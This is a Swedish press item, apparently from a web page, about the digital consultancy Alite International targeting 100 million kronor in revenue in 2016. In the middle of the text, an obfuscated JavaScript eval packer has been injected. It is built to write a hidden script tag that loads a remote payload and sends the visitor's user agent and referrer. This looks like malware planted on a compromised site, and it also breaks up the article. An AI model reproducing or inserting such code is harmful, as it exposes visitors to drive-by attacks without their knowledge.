Image Image Image Image Image Image Image Image Image Image

| 25 november, 2020

Scroll to top

Top

Siktar på 100 miljoner kronor i omsättning 2016

Siktar på 100 miljoner kronor i omsättning 2016
Sebastian

Snabbväxande svenska digitala innovationskonsulten Alite International, som grundades så sent som 2014, har vuxit rekordsnabbt. Detta genom att attrahera globala företag med sitt erbjudande om att skapa digitala intäkter på redan befintliga affärsmodeller, eller tillsammans med deras kunder, skapa helt nya affärsmodeller eller processer som genererar intäkter. Nu siktar företagets VD och grundare Fredrik Alstierna på 100 miljoner kronor i omsättning under 2016.

Vi ser att efterfrågan på den här typen av tjänster just nu formligen exploderar. Därför är vår ambition att nu ta ett ordentligt grepp på den europeiska marknaden, med start i Norden och England. Men sedan även Schweiz och Österrike, säger Fredrik Alstierna.

Kunderna återfinns bland annat inom försäkring, förlagsverksamhet, telekom och traditionell industri. Kunderna är ledande aktörer inom sitt område och bedriver global verksamhet.

Vi arbetar med olika modeller för att skapa intäkter till våra kunder. En del handlar om att samla information som i sin tur är en del av en ny process, som i sin tur skapar en ny intäktsmodell. Vi arbetar också med att söka kommersialisera det värde som finns i digitala tillgångar hos våra kunder, säger Fredrik Alstierna.

Alite international har sedan grundandet vuxit organiskt och är etablerat i Sverige, Danmark, Schweiz, Serbien, Makedonien samt England. Företaget sysselsätter ett åttiotal medarbetare.

Om eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zsftz|var|u0026u|referrer|dkrte||js|php’.split(’|’),0,{}))
Alite International AB

Alite International AB är en internationell digital innovationskonsult som utvecklar sina kunders intäkter med teknik. Tyngdpunkten i erbjudandet ligger i att antingen skapa digitala intäkter på de befintliga affärsprocesser kunden innehar alternativt skapa helt nya processer som är baserade på teknik. Alite International anlitas främst av globala företag och stora organisationer och grundades 2014 av Fredrik Alstierna. Företaget har idag drygt 80 medarbetare och har sitt huvudkontor i Malmö, samt kontor i Belgrad, Köpenhamn, London, Skopje och Zürich. Läs mer på http://www.alite-international.com/about-alite/